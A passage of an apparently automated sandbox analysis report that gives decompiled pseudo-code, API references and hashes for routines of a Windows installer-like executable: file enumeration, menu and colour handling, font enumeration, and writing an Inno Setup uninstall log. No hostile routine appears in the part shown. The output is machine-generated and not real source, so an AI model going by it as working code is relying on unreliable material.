								_v48 = _v368.nFileSizeLow;
								_t219 = E004307E4( &_v48, _a4);
								_t304 = _t219;
								if(_t219 > 0) {
									_t229 = _a4;
									_v48 =  *_t229;
									_t63 = _t229 + 4; // 0x2278c44
									_v44 =  *_t63;
								}
								E0046F304(_a12, 0, _v32, _v5, _t291, _t292, _t304,  &_v48, _a8, _v36,  *((intOrPtr*)(_a24 + 8))); // executed
								_pop(_t241);
								E0043080C(_a4,  &_v48);
							} else {
								if((_t202 & 0x00000002) == 0) {
									_t241 = 0x104;
									E0040355C( &_v28, 0x104,  &(_v368.cFileName));
									goto L7;
								}
							}
						}
						_t205 = FindNextFileA(_v40,  &_v368); // executed
					} while (_t205 != 0);
					_pop(_t283);
					 *[fs:eax] = _t283;
					_push(0x470f64);
					return FindClose(_v40);
				}
			}

0x00470d8c
0x00470d8c
0x00470d8d
0x00470d8f
0x00470d95
0x00470d96
0x00470d97
0x00470d9a
0x00470da0
0x00470da6
0x00470da9
0x00470dac
0x00470daf
0x00470db2
0x00470db5
0x00470db8
0x00470dbd
0x00470dbe
0x00470dc3
0x00470dc6
0x00470dc9
0x00470dcc
0x00470dcf
0x00470dda
0x00470ddf
0x00470de3
0x00470def
0x00470df4
0x00470dfb
0x00470f64
0x00470f67
0x00470f6b
0x00471086
0x00471086
0x0047108a
0x0047108c
0x0047108f
0x00471093
0x00471095
0x00471099
0x004710a4
0x004710a9
0x004710ac
0x004710b0
0x004710c8
0x004710d9
0x004710b2
0x004710b8
0x004710b8
0x004710e5
0x004710f1
0x004710f7
0x004710f7
0x00471099
0x00471093
0x004710fb
0x00471100
0x00471102
0x00471105
0x00471108
0x00471118
0x0047112a
0x00470f71
0x00470f7a
0x00470f88
0x00470f98
0x00470fa3
0x00470fb1
0x00470fb4
0x00470fb8
0x00000000
0x00470fbe
0x00470fbe
0x00470fc0
0x00470fc1
0x00470fc6
0x00470fc9
0x00470fcc
0x00470fd2
0x00470fd7
0x00470fd9
0x00470ffc
0x00471012
0x00471023
0x00471033
0x0047104a
0x0047104a
0x0047104d
0x0047104d
0x0047105b
0x00471060
0x00471060
0x00471068
0x0047106a
0x0047106d
0x00471070
0x0047107e
0x0047107e
0x00470fb8
0x00470e01
0x00470e03
0x00470e04
0x00470e09
0x00470e0c
0x00470e0f
0x00470e0f
0x00470e17
0x00470e21
0x00470e46
0x00470e4b
0x00470e4b
0x00470e4f
0x00470e52
0x00470e55
0x00470e60
0x00470e6e
0x00470e7a
0x00470e94
0x00470e98
0x00470ea3
0x00470ea8
0x00470eae
0x00470eba
0x00470ebf
0x00470ecd
0x00470ecd
0x00470e7c
0x00470e7c
0x00470e7f
0x00470e82
0x00470e8d
0x00470e8d
0x00470ed8
0x00470ee1
0x00470eea
0x00470eef
0x00470ef1
0x00470ef3
0x00470ef8
0x00470efb
0x00470efe
0x00470efe
0x00470f1d
0x00470f22
0x00470f29
0x00470e23
0x00470e25
0x00470e34
0x00470e39
0x00000000
0x00470e39
0x00470e25
0x00470e21
0x00470f39
0x00470f3e
0x00470f48
0x00470f4b
0x00470f4e
0x00470f5c
0x00470f5c

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,00470F5D,?,00000000,?,0049B16C,00000000,0047112B,?,00000000,?,00000000,?,004712F9), ref: 00470F39
FindClose.KERNEL32(000000FF,00470F64,00470F5D,?,00000000,?,0049B16C,00000000,0047112B,?,00000000,?,00000000,?,004712F9,?), ref: 00470F57
FindNextFileA.KERNEL32(000000FF,?,00000000,0047107F,?,00000000,?,0049B16C,00000000,0047112B,?,00000000,?,00000000,?,004712F9), ref: 0047105B
FindClose.KERNEL32(000000FF,00471086,0047107F,?,00000000,?,0049B16C,00000000,0047112B,?,00000000,?,00000000,?,004712F9,?), ref: 00471079

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 979302cab703cee22a63cd7311c233329f25e92f15a8040901896de4b9d0dfb1
Instruction ID: 3617a0173937a19299d8dd4a745a69bb76cc4f671c917c72f52ff549fa862770
Opcode Fuzzy Hash: 979302cab703cee22a63cd7311c233329f25e92f15a8040901896de4b9d0dfb1
Instruction Fuzzy Hash: AFB11B3490424D9FCF11DFA9C881ADEBBB9FF4D304F5085AAE808A7261D739AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0047DF14 Relevance: 6.1, APIs: 4, Instructions: 147
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0047DF14(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, char _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				struct _WIN32_FIND_DATAA _v344;
				char _v348;
				char _v352;
				void* _t63;
				void* _t79;
				signed char _t103;
				int _t106;
				void* _t115;
				intOrPtr _t129;
				intOrPtr _t141;
				void* _t144;
				intOrPtr* _t146;
				void* _t148;
				void* _t149;
				intOrPtr _t150;

				_t148 = _t149;
				_t150 = _t149 + 0xfffffea4;
				_v348 = 0;
				_v352 = 0;
				_v12 = 0;
				_v8 = __ecx;
				_t144 = __edx;
				_t115 = __eax;
				_t146 = _a4;
				_push(_t148);
				_push(0x47e10d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t150;
				_push(__edx);
				_push(_v8);
				_push(_a16);
				E00403634();
				 *((intOrPtr*)(_t146 + 4)) = 0;
				 *_t146 = 0;
				_t63 = E00451DC0(__eax,  &_v344, _v12, __eflags); // executed
				_v16 = _t63;
				if(_v16 != 0xffffffff) {
					do {
						_t103 = _v344.dwFileAttributes;
						if((_t103 & 0x00000010) == 0) {
							if(_a12 == 0) {
								L4:
								_v20 = _v344.nFileSizeHigh;
								_v24 = _v344.nFileSizeLow;
								E00430824(_t146,  &_v24, _t155);
							} else {
								_t155 = _t103 & 0x00000002;
								if((_t103 & 0x00000002) == 0) {
									goto L4;
								}
							}
						}
						_t106 = FindNextFileA(_v16,  &_v344); // executed
					} while (_t106 != 0);
					FindClose(_v16); // executed
				}
				_t157 = _a8;
				if(_a8 == 0) {
					L14:
					__eflags = 0;
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(0x47e114);
					E00403420( &_v352, 2);
					return E00403400( &_v12);
				} else {
					E00403494( &_v348, _t144);
					E0040357C( &_v348, _v8);
					E0040357C( &_v348, 0x47e128);
					_v16 = E00451DC0(_t115,  &_v344, _v348, _t157);
					if(_v16 == 0xffffffff) {
						goto L14;
					} else {
						_push(_t148);
						_push(0x47e0e0);
						_push( *[fs:eax]);
						 *[fs:eax] = _t150;
						do {
							_t79 = E0047BC50( &_v344);
							_t160 = _t79;
							if(_t79 != 0) {
								E00403494( &_v348, _v8);
								E0040355C( &_v352, 0x104,  &(_v344.cFileName));
								E0040357C( &_v348, _v352);
								E0040357C( &_v348, 0x47e134);
								E0047DF14(_t115, _t115, _v348, _t144, _t144, _t146, _t160,  &_v24, _a8, _a12, _a16, _a20);
								E00430824(_t146,  &_v24, _t160);
							}
						} while (FindNextFileA(_v16,  &_v344) != 0);
						_pop(_t141);
						 *[fs:eax] = _t141;
						_push(0x47e0e7);
						return FindClose(_v16);
					}
				}
			}

0x0047df15
0x0047df17
0x0047df22
0x0047df28
0x0047df2e
0x0047df31
0x0047df34
0x0047df36
0x0047df38
0x0047df3d
0x0047df3e
0x0047df43
0x0047df46
0x0047df49
0x0047df4a
0x0047df4d
0x0047df58
0x0047df5f
0x0047df64
0x0047df71
0x0047df76
0x0047df7d
0x0047df7f
0x0047df7f
0x0047df87
0x0047df8d
0x0047df93
0x0047df99
0x0047dfa2
0x0047dfaa
0x0047df8f
0x0047df8f
0x0047df91
0x00000000
0x00000000
0x0047df91
0x0047df8d
0x0047dfba
0x0047dfbf
0x0047dfc7
0x0047dfc7
0x0047dfcc
0x0047dfd0
0x0047e0e7
0x0047e0e7
0x0047e0e9
0x0047e0ec
0x0047e0ef
0x0047e0ff
0x0047e10c
0x0047dfd6
0x0047dfde
0x0047dfec
0x0047dffc
0x0047e014
0x0047e01b
0x00000000
0x0047e021
0x0047e023
0x0047e024
0x0047e029
0x0047e02c
0x0047e02f
0x0047e035
0x0047e03a
0x0047e03c
0x0047e05b
0x0047e071
0x0047e082
0x0047e092
0x0047e0a1
0x0047e0ac
0x0047e0ac
0x0047e0c1
0x0047e0cb
0x0047e0ce
0x0047e0d1
0x0047e0df
0x0047e0df
0x0047e01b

APIs

FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E10D,?,00000000,00000000,?,?,0047F32A,?,?,00000000), ref: 0047DFBA
FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E10D,?,00000000,00000000,?,?,0047F32A,?,?), ref: 0047DFC7
FindNextFileA.KERNEL32(000000FF,?,00000000,0047E0E0,?,?,?,?,00000000,0047E10D,?,00000000,00000000,?,?,0047F32A), ref: 0047E0BC
FindClose.KERNEL32(000000FF,0047E0E7,0047E0E0,?,?,?,?,00000000,0047E10D,?,00000000,00000000,?,?,0047F32A,?), ref: 0047E0DA

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 2a0b9950b456468d4d2336b01520a204549cbae4994cc86594ef00a531a725fa
Instruction ID: e56434d36b3415fcee24497c3a19a3776a0bd12063483664dd205c6200899d48
Opcode Fuzzy Hash: 2a0b9950b456468d4d2336b01520a204549cbae4994cc86594ef00a531a725fa
Instruction Fuzzy Hash: 15515E70A006589FCB10EF66CC45ADEB7B8EF88314F5085AAA408E7351D6389F49CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0042125C Relevance: 6.1, APIs: 4, Instructions: 127
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042125C(void* __eax, intOrPtr __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t42;
				struct HMENU__* _t51;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				void* _t67;
				void* _t82;
				intOrPtr _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				intOrPtr* _t88;

				_t88 = _t87 + 0xfffffff8;
				_t83 = __edx;
				_t67 = __eax;
				if(__edx == 0) {
					L7:
					_t23 =  *((intOrPtr*)(_t67 + 0x124));
					if( *((intOrPtr*)(_t67 + 0x124)) != 0) {
						E004124B8(_t23, 0);
					}
					 *((intOrPtr*)(_t67 + 0x124)) = _t83;
					if(_t83 != 0) {
						E004102C0(_t83, _t67);
					}
					if(_t83 == 0 || ( *(_t67 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t67 + 0x111)) == 3) {
						if(E00418360(_t67) != 0) {
							SetMenu(E004181C8(_t67), 0); // executed
						}
						goto L26;
					} else {
						if( *((char*)( *((intOrPtr*)(_t67 + 0x124)) + 0x34)) != 0 ||  *((char*)(_t67 + 0x116)) == 1) {
							if(( *(_t67 + 0x1c) & 0x00000010) == 0) {
								if( *((char*)(_t67 + 0x116)) != 1 && E00418360(_t67) != 0) {
									SetMenu(E004181C8(_t67), 0);
								}
								goto L26;
							}
							goto L17;
						} else {
							L17:
							if(E00418360(_t67) != 0) {
								_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x124)))) + 0x2c))();
								if(_t42 != GetMenu(E004181C8(_t67))) {
									_t51 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x124)))) + 0x2c))();
									SetMenu(E004181C8(_t67), _t51);
								}
								E004124B8(_t83, E004181C8(_t67));
							}
							L26:
							if( *((char*)(_t67 + 0x115)) != 0) {
								E00421E14(_t67, 0xf0c0, 1);
							}
							return E004211A4(_t67);
						}
					}
				}
				_t58 =  *0x49a62c; // 0x2260660
				_t85 = E004231A4(_t58) - 1;
				if(_t85 >= 0) {
					_t86 = _t85 + 1;
					_t82 = 0;
					do {
						_t60 =  *0x49a62c; // 0x2260660
						if(_t83 ==  *((intOrPtr*)(E00423198(_t60) + 0x124))) {
							_t62 =  *0x49a62c; // 0x2260660
							if(_t67 != E00423198(_t62)) {
								 *_t88 =  *((intOrPtr*)(_t83 + 8));
								 *((char*)(_t88 + 4)) = 0xb;
								E00408D0C(_t67, 0xf0c0, 1, _t82, _t83, 0, _t88);
								E0040311C();
							}
						}
						_t82 = _t82 + 1;
						_t86 = _t86 - 1;
					} while (_t86 != 0);
				}
			}

0x00421260
0x00421263
0x00421265
0x00421269
0x004212cb
0x004212cb
0x004212d3
0x004212d7
0x004212d7
0x004212dc
0x004212e4
0x004212ea
0x004212ea
0x004212f1
0x004213ab
0x004213b7
0x004213b7
0x00000000
0x0042130a
0x00421314
0x00421323
0x00421384
0x0042139b
0x0042139b
0x00000000
0x00421384
0x00000000
0x00421325
0x00421325
0x0042132e
0x0042133c
0x00421350
0x0042135a
0x00421366
0x00421366
0x00421376
0x00421376
0x004213bc
0x004213c3
0x004213c9
0x004213c9
0x004213db
0x004213db
0x00421314
0x004212f1
0x0042126b
0x00421277
0x0042127a
0x0042127c
0x0042127d
0x0042127f
0x00421281
0x00421291
0x00421295
0x004212a1
0x004212a6
0x004212a9
0x004212bd
0x004212c2
0x004212c2
0x004212a1
0x004212c7
0x004212c8
0x004212c8
0x0042127f

APIs

GetMenu.USER32(00000000), ref: 00421349
SetMenu.USER32(00000000,00000000), ref: 00421366
SetMenu.USER32(00000000,00000000), ref: 0042139B
SetMenu.USER32(00000000,00000000), ref: 004213B7

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu
String ID:
API String ID: 3711407533-0
Opcode ID: 1d76e81dd35833b205a42ae4c8d8c5c0cc9283ad9c75a6bad2d47680ff6232b5
Instruction ID: da84ef4eea115e10014a82914d39e849cc0aceb07374f445b9d33d4f60a66388
Opcode Fuzzy Hash: 1d76e81dd35833b205a42ae4c8d8c5c0cc9283ad9c75a6bad2d47680ff6232b5
Instruction Fuzzy Hash: 8D41B0307002544BEB20AB3AA88579A36A65F65308F4801BFFC45DF3A7CA7DCC4583AC

Uniqueness

Uniqueness Score: -1.00%

Function 00416B2A Relevance: 6.1, APIs: 4, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416B2A(void* __eax, int* __edx) {
				void* _t21;
				long _t23;
				long _t37;
				long _t42;
				int _t47;
				struct HWND__* _t50;

				_t49 = __edx;
				_t43 = __eax;
				_t50 =  *(__eax + 0xc0);
				if(_t50 == 0) {
					return E00415304(__eax, __edx);
				}
				_t47 =  *__edx;
				_t21 = _t47 + 0xfffffece - 7;
				if(_t21 < 0) {
					_t23 = SendMessageA(__edx[2], _t47 + 0xbc00, __edx[1], __edx[2]);
					 *(_t49 + 0xc) = _t23;
					return _t23;
				}
				if(_t21 + 0xffff4407 - 7 < 0) {
					SetTextColor(__edx[1], E0041A040( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x44)) + 0x10))));
					SetBkColor(__edx[1], E0041A040(E0041A68C( *((intOrPtr*)(_t43 + 0xbc)))));
					_t37 = E0041A6C8( *((intOrPtr*)(_t43 + 0xbc)));
					 *(_t49 + 0xc) = _t37;
					return _t37;
				}
				_t42 = CallWindowProcA( *(__eax + 0xac), _t50,  *__edx, __edx[1], __edx[2]); // executed
				 *(_t49 + 0xc) = _t42;
				return _t42;
			}

0x00416b30
0x00416b32
0x00416b34
0x00416b3c
0x00000000
0x00416bd6
0x00416b42
0x00416b4b
0x00416b4e
0x00416b6c
0x00416b71
0x00000000
0x00416b71
0x00416b58
0x00416b86
0x00416ba0
0x00416bab
0x00416bb0
0x00000000
0x00416bb0
0x00416bc8
0x00416bcd
0x00000000

APIs

SendMessageA.USER32 ref: 00416B6C
SetTextColor.GDI32(?,00000000), ref: 00416B86
SetBkColor.GDI32(?,00000000), ref: 00416BA0
CallWindowProcA.USER32 ref: 00416BC8

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Color$CallMessageProcSendTextWindow
String ID:
API String ID: 601730667-0
Opcode ID: f83b0eec105fcad8537bcafacbb1dddce3fe903269b5bb7bae79dea9165d51a0
Instruction ID: 4462f2ee7d68fb1bbba42d62c0b2006c3a0d49416eee88ca84ec8b0dcaf29f05
Opcode Fuzzy Hash: f83b0eec105fcad8537bcafacbb1dddce3fe903269b5bb7bae79dea9165d51a0
Instruction Fuzzy Hash: 661121B1204614AFC710EE6ECDC4E9777ECEF49314715882AB59ADB612C63CF8418B29

Uniqueness

Uniqueness Score: -1.00%

Function 00454198 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

WaitForInputIdle.USER32 ref: 004541C4
MsgWaitForMultipleObjects.USER32 ref: 004541E6
GetExitCodeProcess.KERNEL32 ref: 004541F5
CloseHandle.KERNEL32(?,00454222,0045421B,?,?,?,00000000,?,?,004543F7,?,?,?,00000044,00000000,00000000), ref: 00454215

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
String ID:
API String ID: 4071923889-0
Opcode ID: c0d5fa3aae9ee7aa12c16833348d9ed296b9ef03498ebe631b53db86b82891a0
Instruction ID: 060a917c31cca01e8b25c628b59ac47db955e72b40a527d2195dabff2c9b3676
Opcode Fuzzy Hash: c0d5fa3aae9ee7aa12c16833348d9ed296b9ef03498ebe631b53db86b82891a0
Instruction Fuzzy Hash: 5301B9706406187EEB2097A58C06F6B7AACDB85774F510567F904DB2C2D5B85D808668

Uniqueness

Uniqueness Score: -1.00%

Function 004230B0 Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E004230B0(char __edx) {
				char _v5;
				void* __ecx;
				void* __ebp;
				void* _t8;
				struct HDC__* _t18;
				int _t20;
				void* _t22;
				void* _t23;
				char _t24;
				struct HDC__* _t29;
				void* _t30;
				void* _t31;

				_t24 = __edx;
				if(__edx != 0) {
					_t31 = _t31 + 0xfffffff0;
					_t8 = E00402D30(_t8, _t30);
				}
				_v5 = _t24;
				_t22 = _t8;
				E00410208(_t23, 0);
				E00423224(_t22);
				 *(_t22 + 0x20) = E00402B30(1);
				 *((intOrPtr*)(_t22 + 0x2c)) = E00402B30(1);
				_t18 = E00402B30(1);
				 *(_t22 + 0x30) = _t18;
				_push(0);
				L00405F14();
				_t29 = _t18;
				_t5 = _t22 + 0x20; // 0x410638
				_t20 = EnumFontsA(_t29, 0, E00423050,  *_t5); // executed
				_push(0x5a);
				_push(_t29);
				L00405C44();
				 *(_t22 + 0x24) = _t20;
				_push(_t29);
				_push(0);
				L004060FC();
				if(_v5 != 0) {
					_pop( *[fs:0x0]);
				}
				return _t22;
			}

0x004230b0
0x004230b8
0x004230ba
0x004230bd
0x004230bd
0x004230c2
0x004230c5
0x004230cb
0x004230d2
0x004230e3
0x004230f2
0x004230fc
0x00423101
0x00423104
0x00423106
0x0042310b
0x0042310d
0x00423119
0x0042311e
0x00423120
0x00423121
0x00423126
0x00423129
0x0042312a
0x0042312c
0x00423135
0x00423137
0x0042313e
0x00423147

APIs

740BAC50.USER32(00000000,?,?,00000000,?,00418FBB,00000000,?,?,00000001,00000000), ref: 00423106
EnumFontsA.GDI32(00000000,00000000,00423050,00410638,00000000,?,?,00000000,?,00418FBB,00000000,?,?,00000001,00000000), ref: 00423119
740BAD70.GDI32(00000000,0000005A,00000000,00000000,00423050,00410638,00000000,?,?,00000000,?,00418FBB,00000000,?,?,00000001), ref: 00423121
740BB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423050,00410638,00000000,?,?,00000000,?,00418FBB,00000000), ref: 0042312C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: B380EnumFonts
String ID:
API String ID: 1693878748-0
Opcode ID: 98e25c02094b5e3f8430ac4857ce61280ad712df715513848160ae8bd7b9be60
Instruction ID: d0be27f232cf473cc1fd57093da599a9f3ea566e55ca634533e7c5a0987df9fd
Opcode Fuzzy Hash: 98e25c02094b5e3f8430ac4857ce61280ad712df715513848160ae8bd7b9be60
Instruction Fuzzy Hash: EC01DE717043006AE710BFAA5C86B9B3BA49F01718F50027BF808AF3C6D6BE9805476E

Uniqueness

Uniqueness Score: -1.00%

Function 0045B600 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0045B600(void* __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, signed int _a4) {
				intOrPtr _v4104;
				intOrPtr* _v4108;
				signed int _v4109;
				intOrPtr _v4114;
				intOrPtr _v4118;
				char _v4120;
				intOrPtr _v4124;
				signed int _v4236;
				intOrPtr _v4240;
				intOrPtr _v4244;
				intOrPtr _v4248;
				char _v4376;
				char _v4504;
				void _v4568;
				intOrPtr _v4572;
				intOrPtr _v4576;
				intOrPtr _t92;
				intOrPtr _t117;
				intOrPtr _t125;
				signed char _t128;
				intOrPtr _t129;
				intOrPtr _t160;
				void* _t173;
				void* _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t180;

				_t177 = _t178;
				_push(__eax);
				_t180 = _t178 + 0xffffffffffffee28;
				_v4109 = __ecx;
				_t168 = __edx;
				_t173 = __eax;
				_v4104 = 0;
				_t128 = _v4109 ^ 0x00000001;
				if(_t128 == 0) {
					_v4108 = E0044FA8C(1, 0, 2, 2);
				} else {
					_t125 = E0044FA8C(1, 0, 2, 0); // executed
					_v4108 = _t125;
				}
				_push(_t177);
				_push(0x45b869);
				_push( *[fs:edx]);
				 *[fs:edx] = _t180;
				if(_t128 == 0) {
					_t134 = 0x1c0;
					E0044FA28(_v4108, 0x1c0,  &_v4568);
					E0044FA50(_v4108, _v4240);
					E0044FC8C(_v4108);
				} else {
					E00402934( &_v4568, 0x1c0);
					_t134 = 0x1c0;
					 *((intOrPtr*)( *_v4108 + 0x10))();
				}
				_t129 =  *((intOrPtr*)(_t173 + 4));
				while(_t129 != 0) {
					_v4120 =  *((intOrPtr*)(_t129 + 0x10));
					_v4118 =  *((intOrPtr*)(_t129 + 8));
					_v4114 =  *((intOrPtr*)(_t129 + 0xc));
					E0045B588( &_v4120, 0xa, _t177);
					E0045B588(_t129 + 0x12,  *((intOrPtr*)(_t129 + 0xc)), _t177);
					_pop(_t134);
					_t117 = _v4244;
					if(_t117 < 0) {
						L9:
						E004526A4("NumRecs range exceeded", _t129, _t168, _t173, _t186);
					} else {
						_t186 = _t117 - 0x7fffffff;
						if(_t117 >= 0x7fffffff) {
							goto L9;
						}
					}
					_v4244 = _v4244 + 1;
					_t129 =  *((intOrPtr*)(_t129 + 4));
				}
				E0045B504(_t134, _t177); // executed
				 *((intOrPtr*)( *_v4108))();
				_t188 = _v4572;
				if(_v4572 != 0) {
					E004526A4("EndOffset range exceeded", _t129, _t168, _t173, _t188);
				}
				 *((intOrPtr*)( *_v4108))();
				_v4240 = _v4576;
				E0044FA50(_v4108, 0);
				memcpy( &_v4568, 0x5d6dd68 + "Inno Setup Uninstall Log (b)", 0x10 << 2);
				_t175 = _t173;
				E0045B4B0( *((intOrPtr*)(_t175 + 0x14)),  &_v4504, 0x80);
				if((_v4109 ^ 0x00000001 | _a4) != 0) {
					E0045B4B0( *((intOrPtr*)(_t175 + 0x18)),  &_v4376, 0x80);
				}
				_t92 =  *((intOrPtr*)(_t175 + 0x20));
				if(_t92 > _v4248) {
					_v4248 = _t92;
				}
				_v4236 = _v4236 |  *(_t175 + 0x1d);
				_v4124 = E004501E8( &_v4568, 0x1bc);
				FlushFileBuffers( *(_v4108 + 4));
				 *((intOrPtr*)( *_v4108 + 0x10))();
				_pop(_t160);
				 *[fs:eax] = _t160;
				_push(0x45b870);
				return E00402B58(_v4108);
			}

0x0045b601
0x0045b609
0x0045b60a
0x0045b613
0x0045b619
0x0045b61b
0x0045b61f
0x0045b62b
0x0045b630
0x0045b662
0x0045b632
0x0045b641
0x0045b646
0x0045b646
0x0045b66a
0x0045b66b
0x0045b670
0x0045b673
0x0045b680
0x0045b6b2
0x0045b6bd
0x0045b6ce
0x0045b6d9
0x0045b682
0x0045b68f
0x0045b69a
0x0045b6a7
0x0045b6a7
0x0045b6de
0x0045b6e3
0x0045b6e9
0x0045b6f3
0x0045b6fc
0x0045b70e
0x0045b71b
0x0045b720
0x0045b721
0x0045b729
0x0045b732
0x0045b737
0x0045b72b
0x0045b72b
0x0045b730
0x00000000
0x00000000
0x0045b730
0x0045b73c
0x0045b742
0x0045b745
0x0045b74a
0x0045b75e
0x0045b760
0x0045b767
0x0045b76e
0x0045b76e
0x0045b781
0x0045b789
0x0045b797
0x0045b7b7
0x0045b7b9
0x0045b7ca
0x0045b7da
0x0045b7ec
0x0045b7ec
0x0045b7f1
0x0045b7fa
0x0045b7fc
0x0045b7fc
0x0045b813
0x0045b825
0x0045b835
0x0045b84d
0x0045b852
0x0045b855
0x0045b858
0x0045b868

APIs

Part of subcall function 0044FC8C: SetEndOfFile.KERNEL32(?,?,0045B6DE,00000000,0045B869,?,00000000,00000002,00000002), ref: 0044FC93

FlushFileBuffers.KERNEL32(?), ref: 0045B835

Strings

NumRecs range exceeded, xrefs: 0045B732
EndOffset range exceeded, xrefs: 0045B769

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
